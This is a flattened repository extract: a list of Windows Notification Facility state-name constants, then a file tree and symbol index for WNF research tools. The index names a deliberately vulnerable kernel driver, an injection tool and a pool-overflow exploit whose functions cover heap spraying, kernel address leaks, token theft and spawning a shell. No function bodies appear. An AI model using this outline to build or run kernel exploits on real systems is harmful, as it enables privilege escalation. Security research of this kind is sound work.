WNF_LFS_RUNNING_STATE = 0x41950821A3BC1075UL,
WNF_LFS_SIGNIFICANT_LOCATION_EVENT = 0x41950821A3BC5075UL,
WNF_LFS_STATE = 0x41950821A3BC0875UL,
WNF_LIC_DEVICE_LICENSE_MISSING = 0x41850721A3BC3075UL,
WNF_LIC_DEVICE_LICENSE_REMOVED = 0x41850721A3BC2875UL,
WNF_LIC_DEVICE_LICENSE_UPDATED = 0x41850721A3BC2075UL,
WNF_LIC_HARDWAREID_IN_DEVICE_LICENSE_IN_TOLERANCE = 0x41850721A3BC1875UL,
WNF_LIC_HARDWAREID_IN_DEVICE_LICENSE_OUT_OF_TOLERANCE = 0x41850721A3BC1075UL,
WNF_LIC_INT_DEVICE_LICENSE_EXPIRED = 0x41850721A3BC3875UL,
WNF_LIC_LOCAL_MIGRATED_LICENSES_FOUND = 0x41850721A3BC4075UL,
WNF_LIC_MANAGE_DEVICE_REGISTRATION_AND_REACTIVATION = 0x41850721A3BC4875UL,
WNF_LIC_NO_APPLICABLE_LICENSES_FOUND = 0x41850721A3BC0875UL,
WNF_LM_APP_LICENSE_EVENT = 0x41C60321A3BC2875UL,
WNF_LM_CONTENT_LICENSE_CHANGED = 0x41C60321A3BC1075UL,
WNF_LM_LICENSE_REFRESHED = 0x41C60321A3BC3875UL,
WNF_LM_OFFLINE_PC_CHANGED = 0x41C60321A3BC3075UL,
WNF_LM_OPTIONAL_PACKAGE_SUSPEND_REQUIRED = 0x41C60321A3BC2075UL,
WNF_LM_PACKAGE_SUSPEND_REQUIRED = 0x41C60321A3BC0875UL,
WNF_LM_ROOT_LICENSE_CHANGED = 0x41C60321A3BC1875UL,
WNF_LOC_DEVICE_BROKER_ACCESS_CHANGED = 0x41850121A3BC0875UL,
WNF_LOC_RESERVED_WNF_EVENT = 0x41850121A3BC1075UL,
WNF_LOC_SHOW_SYSTRAY = 0x41850121A3BC1875UL,
WNF_LOGN_EOA_FLYOUT_POSITION = 0x0F810121A3BC0835UL,
WNF_LOGN_PINPAD_VISIBLE = 0x0F810121A3BC2035UL,
WNF_LOGN_RETURN_TO_LOCK = 0x0F810121A3BC1835UL,
WNF_LOGN_SLIDE_TO_SHUTDOWN = 0x0F810121A3BC1035UL,
WNF_MAPS_MAPLOADER_PACKAGE_CHANGE = 0x12960F20A3BC2075UL,
WNF_MAPS_MAPLOADER_PROGRESS = 0x12960F20A3BC1075UL,
WNF_MAPS_MAPLOADER_STATUS_CHANGE = 0x12960F20A3BC1875UL,
WNF_MM_BAD_MEMORY_PENDING_REMOVAL = 0x41C60320A3BC0875UL,
WNF_MRT_MERGE_SYSTEM_PRI_FILES = 0x41921C20A3BC2075UL,
WNF_MRT_PERSISTENT_QUALIFIER_CHANGED = 0x41921C20A3BC1C75UL,
WNF_MRT_QUALIFIER_CONTRAST_CHANGED = 0x41921C20A3BC0875UL,
WNF_MRT_QUALIFIER_THEME_CHANGED = 0x41921C20A3BC1075UL,
WNF_MRT_SYSTEM_PRI_MERGE = 0x41921C20A3BC2875UL,
WNF_MSA_ACCOUNTSTATECHANGE = 0x41871D20A3BC0835UL,
WNF_MUR_MEDIA_UI_REQUEST_LAN = 0x41941B20A3BC1075UL,
WNF_MUR_MEDIA_UI_REQUEST_WLAN = 0x41941B20A3BC0875UL,
WNF_NCB_APP_AVAILABLE = 0x41840D23A3BC0875UL,
WNF_NDIS_ADAPTER_ARRIVAL = 0x128F0A23A3BC0875UL,
WNF_NDIS_CORRUPTED_STORE = 0x128F0A23A3BC1075UL,
WNF_NGC_AIKCERT_TRIGGER = 0x41850923A3BC1075UL,
WNF_NGC_CREDENTIAL_REFRESH_REQUIRED = 0x41850923A3BC3875UL,
WNF_NGC_CRYPTO_MDM_POLICY_CHANGED = 0x41850923A3BC3075UL,
WNF_NGC_GESTURE_AUTHENTICATED = 0x41850923A3BC2875UL,
WNF_NGC_PREGEN_DELAY_TRIGGER = 0x41850923A3BC2075UL,
WNF_NGC_PREGEN_TRIGGER = 0x41850923A3BC0875UL,
WNF_NGC_PRO_CSP_POLICY_CHANGED = 0x41850923A3BC1875UL,
WNF_NLA_CAPABILITY_CHANGE = 0x41870223A3BC0875UL,
WNF_NLA_ENTER_SUSPECT_STATE = 0x41870223A3BC1075UL,
WNF_NLA_TASK_TRIGGER = 0x41870223A3BC1875UL,
WNF_NLM_INTERNET_PRESENT = 0x418B0223A3BC1075UL,
WNF_NLM_VPN_RECONNECT_CHANGE = 0x418B0223A3BC0875UL,
WNF_NLS_ACP_CHANGED = 0x41950223A3BC0875UL,
WNF_NLS_GEOID_CHANGED = 0x41950223A3BC3035UL,
WNF_NLS_LANG_UPDATE_LAUNCH = 0x41950223A3BC3875UL,
WNF_NLS_LOCALE_INFO_CHANGED = 0x41950223A3BC2835UL,
WNF_NLS_OEMCP_CHANGED = 0x41950223A3BC1075UL,
WNF_NLS_SETTINGS_REPLICATION_COMPLETE = 0x41950223A3BC4875UL,
WNF_NLS_SETTINGS_REPLICATOR_LAUNCH = 0x41950223A3BC4075UL,
WNF_NLS_USER_DEFAULT_LOCALE_CHANGED = 0x41950223A3BC1835UL,
WNF_NLS_USER_UILANG_CHANGED = 0x41950223A3BC2035UL,
WNF_OLIC_OS_EDITION_CHANGE = 0x028F0222A3BC5075UL,
WNF_OOBE_SHL_MAGNIFIER_CONFIRM = 0x04840122A3BC1035UL,
WNF_OOBE_SHL_MAGNIFIER_QUERY = 0x04840122A3BC0835UL,
WNF_OS_IP_OVER_USB_AVAILABLE = 0x41C61D22A3BC8075UL,
WNF_OS_IU_PROGRESS_REPORT = 0x41C61D22A3BC8875UL,
WNF_OSWN_STORAGE_APP_PAIRING_CHANGE = 0x0F911D22A3BC8075UL,
WNF_OSWN_STORAGE_FINISHED_USAGE_CATEGORY_UPDATE = 0x0F911D22A3BCB875UL,
WNF_OSWN_STORAGE_FREE_SPACE_CHANGE = 0x0F911D22A3BC7075UL,
WNF_OSWN_STORAGE_PRESENCE_CHANGE = 0x0F911D22A3BC6075UL,
WNF_OSWN_STORAGE_SHELLHWD_EVENT = 0x0F911D22A3BCC075UL,
WNF_OSWN_STORAGE_TEMP_CLEANUP_CHANGE = 0x0F911D22A3BC7875UL,
WNF_OSWN_STORAGE_VOLUME_STATUS_CHANGE = 0x0F911D22A3BC6875UL,
WNF_OSWN_SYSTEM_CLOCK_CHANGED = 0x0F911D22A3BC5875UL,
WNF_OVRD_OVERRIDESCALEUPDATED = 0x05941822A3BC0875UL,
WNF_PHN_CALL_STATUS = 0x4188063DA3BC2875UL,
WNF_PHN_CALLFORWARDING_STATUS_LINE0 = 0x4188063DA3BC3075UL,
WNF_PHNL_LINE1_READY = 0x0D88063DA3BC4075UL,
WNF_PHNP_ANNOTATION_ENDPOINT = 0x1188063DA3BC4875UL,
WNF_PHNP_SERVICE_INITIALIZED = 0x1188063DA3BC3875UL,
WNF_PHNP_SIMSEC_READY = 0x1188063DA3BC4075UL,
WNF_PNPA_DEVNODES_CHANGED = 0x0096003DA3BC0875UL,
WNF_PNPA_DEVNODES_CHANGED_SESSION = 0x0096003DA3BC1035UL,
WNF_PNPA_HARDWAREPROFILES_CHANGED = 0x0096003DA3BC2875UL,
WNF_PNPA_HARDWAREPROFILES_CHANGED_SESSION = 0x0096003DA3BC3035UL,
WNF_PNPA_PORTS_CHANGED = 0x0096003DA3BC3875UL,
WNF_PNPA_PORTS_CHANGED_SESSION = 0x0096003DA3BC4035UL,
WNF_PNPA_VOLUMES_CHANGED = 0x0096003DA3BC1875UL,
WNF_PNPA_VOLUMES_CHANGED_SESSION = 0x0096003DA3BC2035UL,
WNF_PNPB_AWAITING_RESPONSE = 0x0396003DA3BC0875UL,
WNF_PNPC_CONTAINER_CONFIG_REQUESTED = 0x0296003DA3BC1875UL,
WNF_PNPC_DEVICE_INSTALL_REQUESTED = 0x0296003DA3BC1075UL,
WNF_PNPC_REBOOT_REQUIRED = 0x0296003DA3BC0875UL,
WNF_PO_BACKGROUND_ACTIVITY_POLICY = 0x41C6013DA3BC9075UL,
WNF_PO_BATTERY_CHARGE_LEVEL = 0x41C6013DA3BC8075UL,
WNF_PO_BATTERY_DISCHARGING = 0x41C6013DA3BC9875UL,
WNF_PO_CHARGE_ESTIMATE = 0x41C6013DA3BC6075UL,
WNF_PO_COMPOSITE_BATTERY = 0x41C6013DA3BC1075UL,
WNF_PO_DISCHARGE_ESTIMATE = 0x41C6013DA3BC5075UL,
WNF_PO_DISCHARGE_START_FILETIME = 0x41C6013DA3BC5C75UL,
WNF_PO_DISPLAY_REQUEST_ACTIVE = 0x41C6013DA3BC7835UL,
WNF_PO_ENERGY_SAVER_OVERRIDE = 0x41C6013DA3BC3075UL,
WNF_PO_ENERGY_SAVER_SETTING = 0x41C6013DA3BC2875UL,
WNF_PO_ENERGY_SAVER_STATE = 0x41C6013DA3BC2075UL,
WNF_PO_POWER_STATE_CHANGE = 0x41C6013DA3BC1875UL,
WNF_PO_PREVIOUS_SHUTDOWN_STATE = 0x41C6013DA3BCB075UL,
WNF_PO_PRIMARY_DISPLAY_LOGICAL_STATE = 0x41C6013DA3BCA875UL,
WNF_PO_PRIMARY_DISPLAY_VISIBLE_STATE = 0x41C6013DA3BCA075UL,
WNF_PO_SCENARIO_CHANGE = 0x41C6013DA3BC0875UL,
WNF_PO_SLEEP_STUDY_USER_PRESENCE_CHANGED = 0x41C6013DA3BC8875UL,
WNF_PO_THERMAL_HIBERNATE_OCCURRED = 0x41C6013DA3BC4875UL,
WNF_PO_THERMAL_OVERTHROTTLE = 0x41C6013DA3BC6875UL,
WNF_PO_THERMAL_SHUTDOWN_OCCURRED = 0x41C6013DA3BC4075UL,
WNF_PO_THERMAL_STANDBY = 0x41C6013DA3BC3875UL,
WNF_PO_USER_AWAY_PREDICTION = 0x41C6013DA3BC7075UL,
WNF_PROV_TURN_COMPLETE = 0x17891C3DA3BC0875UL,
WNF_PS_WAKE_CHARGE_RESOURCE_POLICY = 0x41C61D3DA3BC0875UL,
WNF_RM_GAME_MODE_ACTIVE = 0x41C6033FA3BC1075UL,
WNF_RM_MEMORY_MONITOR_USAGE_LEVEL = 0x41C6033FA3BC0875UL,
WNF_RPCF_FWMAN_RUNNING = 0x07851E3FA3BC0875UL,
WNF_RTDS_NAMED_PIPE_TRIGGER_CHANGED = 0x12821A3FA3BC1875UL,
WNF_RTDS_RPC_INTERFACE_TRIGGER_CHANGED = 0x12821A3FA3BC0875UL,
WNF_SBS_UPDATE_AVAILABLE = 0x41950C3EA3BC0875UL,
WNF_SCM_AUTOSTART_STATE = 0x418B0D3EA3BC0875UL,
WNF_SDO_ORIENTATION_CHANGE = 0x41890A3EA3BC0875UL,
WNF_SEB_AIRPLANE_MODE_DISABLED_FOR_EM
gitextract_pkqmh3wi/
├── .gitignore
├── KernelPrimitive/
│ ├── PoolVulnDrv/
│ │ ├── PoolVulnDrv/
│ │ │ ├── PoolVulnDrv.cpp
│ │ │ ├── PoolVulnDrv.h
│ │ │ ├── PoolVulnDrv.vcxproj
│ │ │ └── PoolVulnDrv.vcxproj.filters
│ │ └── PoolVulnDrv.sln
│ └── WnfPoolOverflow/
│ ├── WnfPoolOverflow/
│ │ ├── App.config
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── WnfPoolOverflow.cs
│ │ └── WnfPoolOverflow.csproj
│ └── WnfPoolOverflow.sln
├── LICENSE
├── README.md
├── SharpWnfSuite/
│ ├── SharpWnfClient/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── HexDump.cs
│ │ │ └── WnfCom.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfClient.cs
│ │ └── SharpWnfClient.csproj
│ ├── SharpWnfDump/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── Globals.cs
│ │ │ ├── Helpers.cs
│ │ │ ├── HexDump.cs
│ │ │ └── Modules.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfDump.cs
│ │ └── SharpWnfDump.csproj
│ ├── SharpWnfInject/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Delegates.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── Globals.cs
│ │ │ ├── Helpers.cs
│ │ │ ├── Modules.cs
│ │ │ └── Utilities.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfInject.cs
│ │ └── SharpWnfInject.csproj
│ ├── SharpWnfNameDumper/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Library/
│ │ │ ├── Header.cs
│ │ │ ├── Helpers.cs
│ │ │ └── Modules.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfNameDumper.cs
│ │ └── SharpWnfNameDumper.csproj
│ ├── SharpWnfScan/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Delegates.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── Globals.cs
│ │ │ ├── Header.cs
│ │ │ ├── Helpers.cs
│ │ │ ├── Modules.cs
│ │ │ └── Utilities.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfScan.cs
│ │ └── SharpWnfScan.csproj
│ ├── SharpWnfServer/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── HexDump.cs
│ │ │ └── WnfCom.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfServer.cs
│ │ └── SharpWnfServer.csproj
│ └── SharpWnfSuite.sln
└── WnfCallbackPayload/
├── README.md
├── WnfCallbackPayload/
│ ├── WnfCallbackPayload.c
│ ├── WnfCallbackPayload.vcxproj
│ ├── WnfCallbackPayload.vcxproj.filters
│ ├── WnfCallbackPayload.vcxproj.user
│ └── function_order.txt
└── WnfCallbackPayload.sln
SYMBOL INDEX (834 symbols across 134 files)
FILE: KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.cpp
function NTSTATUS (line 14) | NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STR...
function PoolVulnDrvUnload (line 62) | void PoolVulnDrvUnload(_In_ PDRIVER_OBJECT DriverObject)
function NTSTATUS (line 81) | NTSTATUS PoolVulnDrvCreateClose(_In_ PDEVICE_OBJECT, _Inout_ PIRP Irp)
function NTSTATUS (line 91) | NTSTATUS PoolVulnDrvDeviceControl(_In_ PDEVICE_OBJECT, _Inout_ PIRP Irp)
function NTSTATUS (line 131) | NTSTATUS AllocateOverflowBufferHandler(_In_ PVOID UserBuffer, _In_ SIZE_...
function NTSTATUS (line 169) | NTSTATUS FreeOverflowBufferHandler()
function NTSTATUS (line 188) | NTSTATUS TriggerOverflowHandler(_In_ PVOID UserBuffer, _In_ SIZE_T Size)
FILE: KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.h
type ALLOCATED_BUFFER_INFO (line 19) | typedef struct _ALLOCATED_BUFFER_INFO
FILE: KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow/WnfPoolOverflow.cs
class WnfPoolOverflow (line 7) | class WnfPoolOverflow
type ACCESS_MASK (line 12) | [Flags]
type WELL_KNOWN_SID_TYPE (line 53) | enum WELL_KNOWN_SID_TYPE
type WNF_DATA_SCOPE (line 118) | enum WNF_DATA_SCOPE
type WNF_STATE_NAME_LIFETIME (line 128) | enum WNF_STATE_NAME_LIFETIME
type ACCESS_ALLOWED_ACE (line 139) | [StructLayout(LayoutKind.Sequential)]
type ACE_HEADER (line 147) | [StructLayout(LayoutKind.Sequential)]
type ACL (line 155) | [StructLayout(LayoutKind.Sequential)]
type EX_RUNDOWN_REF (line 165) | [StructLayout(LayoutKind.Sequential)]
type LIST_ENTRY (line 171) | [StructLayout(LayoutKind.Sequential)]
type PROCESS_INFORMATION (line 178) | [StructLayout(LayoutKind.Sequential)]
type RTL_BALANCED_NODE (line 187) | [StructLayout(LayoutKind.Sequential)]
type SECURITY_DESCRIPTOR (line 195) | [StructLayout(LayoutKind.Sequential)]
type STARTUPINFO (line 207) | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
type WNF_NAME_INSTANCE (line 230) | [StructLayout(LayoutKind.Sequential)]
type WNF_NODE_HEADER (line 251) | [StructLayout(LayoutKind.Sequential)]
type WNF_STATE_DATA (line 258) | [StructLayout(LayoutKind.Sequential)]
type WNF_STATE_NAME_REGISTRATION (line 267) | [StructLayout(LayoutKind.Sequential)]
method AddAccessAllowedAce (line 278) | [DllImport("advapi32.dll", SetLastError = true)]
method CloseHandle (line 285) | [DllImport("kernel32.dll", SetLastError = true)]
method CreateFile (line 288) | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
method CreateProcess (line 298) | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
method CreateWellKnownSid (line 311) | [DllImport("advapi32.dll", SetLastError = true)]
method DeviceIoControl (line 318) | [DllImport("kernel32.dll", SetLastError = true)]
method InitializeAcl (line 329) | [DllImport("advapi32.dll", SetLastError = true)]
method InitializeSecurityDescriptor (line 335) | [DllImport("advapi32.dll", SetLastError = true)]
method NtCreateWnfStateName (line 340) | [DllImport("ntdll.dll")]
method NtDeleteWnfStateData (line 350) | [DllImport("ntdll.dll")]
method NtDeleteWnfStateName (line 355) | [DllImport("ntdll.dll")]
method NtQueryWnfStateData (line 358) | [DllImport("ntdll.dll")]
method NtReadVirtualMemory (line 367) | [DllImport("ntdll.dll")]
method NtUpdateWnfStateData (line 375) | [DllImport("ntdll.dll")]
method NtWriteVirtualMemory (line 385) | [DllImport("ntdll.dll")]
method RtlGetNtVersionNumbers (line 393) | [DllImport("ntdll.dll")]
method SetSecurityDescriptorDacl (line 399) | [DllImport("advapi32.dll", SetLastError = true)]
method WaitForSingleObject (line 406) | [DllImport("kernel32.dll", SetLastError = true)]
method AllocateWnfNameInstance (line 448) | static ulong AllocateWnfNameInstance(IntPtr pSecurityDescriptor)
method AllocateWnfStateData (line 471) | static bool AllocateWnfStateData(ulong stateName, byte[] data)
method CheckTargetVersion (line 490) | static bool CheckTargetVersion()
method FreeWnfNameInstance (line 693) | static bool FreeWnfNameInstance(ulong stateName)
method FreeWnfStateData (line 699) | static bool FreeWnfStateData(ulong stateName)
method GetDeviceHandle (line 705) | static IntPtr GetDeviceHandle(string devicePath)
method GetWorldGenericAllSecurityDescriptor (line 718) | static IntPtr GetWorldGenericAllSecurityDescriptor()
method IoctlAllocateObject (line 792) | static bool IoctlAllocateObject(IntPtr hDevice)
method IoctlFreeObject (line 815) | static bool IoctlFreeObject(IntPtr hDevice)
method IoctlOverflowObject (line 829) | static bool IoctlOverflowObject(IntPtr hDevice, IntPtr buffer, int size)
method IsKernelAddress (line 843) | static bool IsKernelAddress(IntPtr address)
method LeakKernelData (line 849) | static bool LeakKernelData(
method LeakKthreadAddress (line 935) | static IntPtr LeakKthreadAddress(
method ReadPointer (line 974) | static IntPtr ReadPointer(IntPtr address)
method SetPreviousModeSwitch (line 996) | static bool SetPreviousModeSwitch(
method SwitchPreviousMode (line 1024) | static bool SwitchPreviousMode(
method SpawnShell (line 1049) | static bool SpawnShell()
method SprayWnfObject (line 1083) | static void SprayWnfObject()
method StealToken (line 1124) | static bool StealToken(IntPtr pEprocess)
method WritePointer (line 1158) | static bool WritePointer(IntPtr address, IntPtr pointer)
method Main (line 1176) | static void Main()
FILE: SharpWnfSuite/SharpWnfClient/Handler/CommandLineParser.cs
class CommandLineParser (line 7) | internal class CommandLineParser
class CommandLineOption (line 9) | private class CommandLineOption
method CommandLineOption (line 20) | public CommandLineOption(
method CommandLineOption (line 36) | public CommandLineOption(
method GetBriefName (line 57) | public string GetBriefName()
method GetDescription (line 62) | public string GetDescription()
method GetFlag (line 67) | public bool GetFlag()
method GetFullName (line 76) | public string GetFullName()
method GetIsParsed (line 81) | public bool GetIsParsed()
method GetIsRequired (line 86) | public bool GetIsRequired()
method GetOptionType (line 91) | public OptionType GetOptionType()
method GetValue (line 96) | public string GetValue()
method SetFlag (line 105) | public void SetFlag()
method SetIsParsed (line 110) | public void SetIsParsed()
method SetValue (line 115) | public void SetValue(string _value)
type OptionType (line 121) | private enum OptionType
method AddArgument (line 135) | public void AddArgument(
method AddFlag (line 161) | public void AddFlag(
method AddParameter (line 193) | public void AddParameter(
method AddExclusive (line 227) | public void AddExclusive(List<string> exclusive)
method GetFlag (line 233) | public bool GetFlag(string key)
method GetHelp (line 254) | public void GetHelp()
method GetValue (line 302) | public string GetValue(string key)
method ListOptions (line 323) | public void ListOptions()
method Parse (line 380) | public string[] Parse(string[] args)
method SetOptionName (line 506) | public void SetOptionName(string optionName)
method SetTitle (line 512) | public void SetTitle(string title)
FILE: SharpWnfSuite/SharpWnfClient/Handler/Execute.cs
class Execute (line 5) | internal class Execute
method Run (line 7) | public static void Run(CommandLineParser options)
FILE: SharpWnfSuite/SharpWnfClient/Interop/NativeMethods.cs
class NativeMethods (line 8) | internal class NativeMethods
method NtClose (line 10) | [DllImport("ntdll.dll")]
method NtCreateEvent (line 13) | [DllImport("ntdll.dll")]
method NtCreateWnfStateName (line 21) | [DllImport("ntdll.dll")]
method NtOpenKey (line 31) | [DllImport("ntdll.dll")]
method NtQueryValueKey (line 37) | [DllImport("ntdll.dll")]
method NtQueryWnfStateData (line 46) | [DllImport("ntdll.dll")]
method NtUpdateWnfStateData (line 55) | [DllImport("ntdll.dll")]
method NtWaitForSingleObject (line 65) | [DllImport("ntdll.dll")]
method RtlSubscribeWnfStateChangeNotification (line 71) | [DllImport("ntdll.dll")]
method RtlUnsubscribeWnfStateChangeNotification (line 82) | [DllImport("ntdll.dll")]
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1507.cs
type WELL_KNOWN_WNF_NAME_1507 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1507 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1511.cs
type WELL_KNOWN_WNF_NAME_1511 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1511 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1607.cs
type WELL_KNOWN_WNF_NAME_1607 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1607 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1703.cs
type WELL_KNOWN_WNF_NAME_1703 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1703 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1709.cs
type WELL_KNOWN_WNF_NAME_1709 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1709 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1803.cs
type WELL_KNOWN_WNF_NAME_1803 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1803 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1809.cs
type WELL_KNOWN_WNF_NAME_1809 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1809 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1903To1909.cs
type WELL_KNOWN_WNF_NAME_1903_TO_1909 (line 3) | internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName2004To21H1.cs
type WELL_KNOWN_WNF_NAME_2004_TO_21H1 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName2022.cs
type WELL_KNOWN_WNF_NAME_2022 (line 3) | internal enum WELL_KNOWN_WNF_NAME_2022 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName21H2.cs
type WELL_KNOWN_WNF_NAME_21H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName22H2.cs
type WELL_KNOWN_WNF_NAME_22H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName23H2.cs
type WELL_KNOWN_WNF_NAME_23H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName24H2.cs
type WELL_KNOWN_WNF_NAME_24H2 (line 3) | internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong
FILE: SharpWnfSuite/SharpWnfClient/Interop/Win32Consts.cs
class Win32Consts (line 7) | internal class Win32Consts
FILE: SharpWnfSuite/SharpWnfClient/Interop/Win32Enums.cs
type ACCESS_MASK (line 5) | [Flags]
type ACE_FLAGS (line 42) | [Flags]
type ACE_TYPE (line 55) | internal enum ACE_TYPE : byte
type ACL_REVISION (line 82) | internal enum ACL_REVISION : byte
type BOOLEAN (line 88) | internal enum BOOLEAN : byte
type EVENT_TYPE (line 94) | internal enum EVENT_TYPE
